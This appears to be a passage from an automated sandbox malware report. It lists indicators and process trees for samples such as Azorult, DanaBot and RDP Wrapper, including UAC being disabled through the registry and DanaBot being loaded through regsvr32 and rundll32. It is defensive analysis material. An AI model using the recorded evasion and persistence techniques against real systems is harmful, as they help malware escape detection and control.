24898505\manifest.json
1764881355\manifest.json
976953327\_metadata\verified_contents.json
1616464308\office_endpoints_list.json
1616464308\manifest.fingerprint
84579926\manifest.fingerprint
933065173\deny_domains.list
933065173\deny_full_domains.list
976953327\manifest.json
84579926\classification.js
84579926\travel-facilitated-booking-bing.js
1559524024\manifest.json
1715725482\manifest.json
1715725482\protocols.json
2031229069\manifest.fingerprint
The Azorult.exe rows are the ones to act on: opening each vendor directory for modification is how the sample checks for, and tries to interfere with, installed security products, and that directory list is a ready-made hunt query. The attrib.exe rows on the RDP Wrapper files line up with the Sets file to hidden signature.
Launches sc.exe 24 IoCs
Sc.exe is a Windows utility to control services on the system.
sc.exe PIDs: 3448, 3264, 1716, 3016, 3884, 5776, 4456, 5408, 3964, 3256, 5500, 316, 3084, 5308, 2192, 1568, 2388, 1016, 4184, 4372, 4884, 1788, 5324, 5468
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | occurrences (Process is netsh.exe in all 64 rows)
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | 21
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | 21
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | 19
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | 1
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | 1
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | 1
Every row is a read (open, query or enumerate). netsh.exe reads these keys to load its helper DLLs on every start, so this is a side effect of the 23 netsh.exe invocations under Modifies Windows Firewall rather than evidence that a helper DLL was registered; a registration would show up as a Set value under one of these keys.
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 4 IoCs
pid | pid_target | Process | procid_target
460 | 1324 | WerFault.exe | 145
4360 | 5768 | WerFault.exe | 148
5124 | 4184 | WerFault.exe | 159
2460 | 5144 | WerFault.exe | 161
The four crashed PIDs are the four DanaBot.exe instances listed under Executes dropped EXE, so the DanaBot executable did not run to completion in this environment; the DanaBot C2 traffic seen in the run comes from the rundll32.exe instances instead.
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description: Key opened | ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Process | count
cmd.exe | 16
icacls.exe | 15
sc.exe | 7
netsh.exe | 7
net1.exe | 4
SpySheriff.exe | 2
schtasks.exe | 2
timeout.exe | 2
attrib.exe | 1
net.exe | 1
R8.exe | 1
Rar.exe | 1
RDPWInst.exe | 1
regedit.exe | 1
regsvr32.exe | 1
rundll32.exe | 1
taskhost.exe | 1
The built-in console tools read this key to pick their message resources, so most of these rows are noise from the command-line activity elsewhere in the report. The dropped binaries (SpySheriff.exe, R8.exe, taskhost.exe, and the bundled Rar.exe and RDPWInst.exe) are the rows that could reflect an actual language check.
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | winit.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winit.exe
Delays execution with timeout.exe 7 IoCs
pid | Process
2160 | timeout.exe
5716 | timeout.exe
1932 | timeout.exe
5476 | timeout.exe
5992 | timeout.exe
3976 | timeout.exe
4868 | timeout.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid | Process
4116 | ipconfig.exe
Kills process with taskkill 5 IoCs
pid | Process
2700 | taskkill.exe
1412 | taskkill.exe
5680 | taskkill.exe
5992 | taskkill.exe
4312 | taskkill.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921237954079128" | msedge.exe
Modifies registry class 10 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | winit.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | winit.exe
Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | R8.exe
Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | msedge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | wini.exe
Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings | OpenWith.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{BA141F2C-3A75-459F-A01F-78DB12628BC1} | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\MIME\Database | winit.exe
NTFS ADS 1 IoCs
description | ioc | Process
File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | taskhostw.exe
Opens file in notepad (likely ransom note) 1 IoCs
pid | Process
4376 | NOTEPAD.EXE
Runs .reg file with regedit 2 IoCs
pid | Process
4868 | regedit.exe
2416 | regedit.exe
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
5508 | schtasks.exe
4772 | schtasks.exe
520 | schtasks.exe
1940 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process (consecutive identical entries collapsed; ×N is the count)
5848 | msedge.exe (×2)
5316 | Azorult.exe (×6)
4676 | Azorult.exe (×6)
5316 | Azorult.exe (×4)
4676 | Azorult.exe (×4)
1748 | rutserv.exe (×6)
3112 | rutserv.exe (×2)
3416 | rutserv.exe (×2)
6124 | rutserv.exe (×6)
5284 | rfusclient.exe (×2)
4900 | winit.exe (×24)
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid | Process
5188 | taskhostw.exe
708 | OpenWith.exe
Suspicious behavior: LoadsDriver 3 IoCs
pid | Process (consecutive identical entries collapsed; ×N is the count)
672 | Process not Found (×3)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 38 IoCs
pid | Process (consecutive identical entries collapsed; ×N is the count)
4936 | msedge.exe (×38)
Suspicious behavior: SetClipboardViewer 1 IoCs
pid | Process
4344 | rfusclient.exe
Suspicious use of AdjustPrivilegeToken 14 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1748 | rutserv.exe
Token: SeDebugPrivilege | 3416 | rutserv.exe
Token: SeTakeOwnershipPrivilege | 6124 | rutserv.exe
Token: SeTcbPrivilege | 6124 | rutserv.exe
Token: SeTcbPrivilege | 6124 | rutserv.exe
Token: SeDebugPrivilege | 2700 | taskkill.exe
Token: SeDebugPrivilege | 1412 | taskkill.exe
Token: SeDebugPrivilege | 3252 | powershell.exe
Token: SeDebugPrivilege | 5680 | taskkill.exe
Token: SeAuditPrivilege | 4348 | svchost.exe
Token: SeDebugPrivilege | 5988 | RDPWInst.exe
Token: SeAuditPrivilege | 1844 | svchost.exe
Token: SeDebugPrivilege | 5992 | taskkill.exe
Token: SeDebugPrivilege | 4312 | taskkill.exe
Suspicious use of FindShellTrayWindow 51 IoCs
pid | Process (consecutive identical entries collapsed; ×N is the count)
4936 | msedge.exe (×51)
Suspicious use of SetWindowsHookEx 32 IoCs
pid | Process (consecutive identical entries collapsed; ×N is the count)
4676 | Azorult.exe
5316 | Azorult.exe
6116 | wini.exe
4900 | winit.exe
1748 | rutserv.exe
3112 | rutserv.exe
5092 | cheat.exe
3416 | rutserv.exe
4312 | ink.exe
6124 | rutserv.exe
5388 | taskhost.exe
1216 | P.exe
4184 | R8.exe
5188 | taskhostw.exe
5356 | winlogon.exe
708 | OpenWith.exe (×17)
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (consecutive identical entries collapsed; ×N is the count)
PID 4936 wrote to memory of 2316 | 4936 | msedge.exe | 87 (×2)
PID 4936 wrote to memory of 3476 | 4936 | msedge.exe | 88 (×2)
PID 4936 wrote to memory of 2928 | 4936 | msedge.exe | 89 (×51)
PID 4936 wrote to memory of 1116 | 4936 | msedge.exe | 90 (×9)
System policy modification 1 TTPs 3 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Azorult.exe
Views/modifies file attributes 1 TTPs 6 IoCs
pid | Process
3936 | attrib.exe
5620 | attrib.exe
2200 | attrib.exe
3920 | attrib.exe
5668 | attrib.exe
3016 | attrib.exe
Processes
[depth 1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20250322_162339.webp
  PID: 4936
  - Drops file in Program Files directory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x314,0x7ffb204ef208,0x7ffb204ef214,0x7ffb204ef220
    PID: 2316
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1732,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
    PID: 3476
    - Downloads MZ/PE file

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
    PID: 2928

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2444 /prefetch:8
    PID: 1116
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
    PID: 4844

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
    PID: 744

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4204,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:1
    PID: 544

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:2
    PID: 640
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3940,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:8
    PID: 2976

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:8
    PID: 4624

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
    PID: 4428

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:8
    PID: 4752
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8
    PID: 1180

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8
    PID: 1796

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6064,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:8
    PID: 2748

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6216,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:8
    PID: 892
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:8
    PID: 3984

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6324,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:8
    PID: 4184

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6560,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8
    PID: 4576

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:8
    PID: 3976
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:8
    PID: 1060

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6892,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8
    PID: 3196

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6672,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:1
    PID: 1936

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:8
    PID: 2724
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4408,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:1
    PID: 2084

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=4448,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:1
    PID: 5788

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6880,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:1
    PID: 6072

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=6692,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:1
    PID: 116
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:8
    PID: 5232

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7120,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6152 /prefetch:8
    PID: 5240

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=704 /prefetch:8
    PID: 5236

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=6500,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1
    PID: 5640
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:8
    PID: 5336

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5428,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:1
    PID: 5304

  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7408 /prefetch:8
    PID: 1296
  [depth 2] C:\Users\Admin\Downloads\DanaBot.exe
    Command line: "C:\Users\Admin\Downloads\DanaBot.exe"
    PID: 1324
    - Executes dropped EXE

    [depth 3] C:\Windows\SysWOW64\regsvr32.exe
      Command line: C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@1324
      PID: 4812
      - Loads dropped DLL

      [depth 4] C:\Windows\SysWOW64\rundll32.exe
        Command line: C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
        PID: 2748
        - Blocklisted process makes network request
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery

    [depth 3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 472
      PID: 460
      - Program crash
  [depth 2] C:\Users\Admin\Downloads\DanaBot.exe
    Command line: "C:\Users\Admin\Downloads\DanaBot.exe"
    PID: 5768
    - Executes dropped EXE

    [depth 3] C:\Windows\SysWOW64\regsvr32.exe
      Command line: C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5768
      PID: 4548
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery

      [depth 4] C:\Windows\SysWOW64\rundll32.exe
        Command line: C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
        PID: 5524
